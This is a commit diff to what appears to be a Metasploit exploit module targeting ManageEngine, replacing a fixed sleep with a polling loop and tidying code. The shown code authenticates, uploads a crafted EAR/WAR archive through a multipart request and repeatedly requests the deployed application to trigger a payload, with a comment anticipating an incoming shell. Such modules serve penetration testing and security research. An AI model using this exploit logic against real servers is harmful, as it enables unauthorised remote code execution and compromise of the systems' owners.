Avoid sleep(), survey instead

jvazquez-r7 · jvazquez-r7 · commit 6403098fbc6f · 2015-01-19T17:22:04.000-06:00
diff --git a/modules/exploits/multi/http/manageengine_auth_upload.rb b/modules/exploits/multi/http/manageengine_auth_upload.rb
@@ -67,8 +67,6 @@ def initialize(info = {})
     register_options(
       [
         Opt::RPORT(8080),
-        OptInt.new('SLEEP',
-          [true, 'Seconds to sleep while we wait for EAR deployment', 15]),
         OptString.new('JSESSIONID',
           [false, 'Pre-authenticated JSESSIONID cookie (non-IT360 targets)']),
         OptString.new('IAMAGENTTICKET',
@@ -378,7 +376,7 @@ def exploit
       cookie = login
     end
 
-    if cookie == nil
+    if cookie.nil?
       fail_with(Exploit::Failure::Unknown, "#{peer} - Failed to authenticate")
     end
 
@@ -388,7 +386,11 @@ def exploit
 
     # ... and then we create an EAR file that will contain it.
     ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
-    app_xml = %Q{<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + ".war"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}
+    app_xml = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
+    app_xml << '<application>'
+    app_xml << "<display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name>"
+    app_xml << "<module><web><web-uri>#{war_app_base + ".war"}</web-uri>"
+    app_xml << "<context-root>/#{ear_app_base}</context-root></web></module></application>"
 
     # Zipping with CM_STORE to avoid errors while decompressing the zip
     # in the Java vulnerable application
@@ -412,19 +414,24 @@ def exploit
     print_status("#{peer} - Uploading EAR file...")
     res = send_multipart_request(cookie, ear_file_name, ear_file.pack)
     if res && res.code == 200
-      print_status("#{peer} - Upload appears to have been successful, waiting " + datastore['SLEEP'].to_s +
-      ' seconds for deployment')
-      sleep(datastore['SLEEP'])
+      print_status("#{peer} - Upload appears to have been successful")
     else
       fail_with(Exploit::Failure::Unknown, "#{peer} - EAR upload failed")
     end
 
-    res = send_request_cgi({
-      'uri'    => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
-      'method' => 'GET'
-    })
-    if res && res.code != 200
-      fail_with(Exploit::Failure::Unknown, "#{peer} - Exploit failed, received HTTP " + res.code.to_s)
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{peer} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi({
+        'uri'    => normalize_uri(ear_app_base, war_app_base, Rex::Text.rand_text_alpha(rand(8)+8)),
+        'method' => 'GET'
+      })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
     end
   end
 end
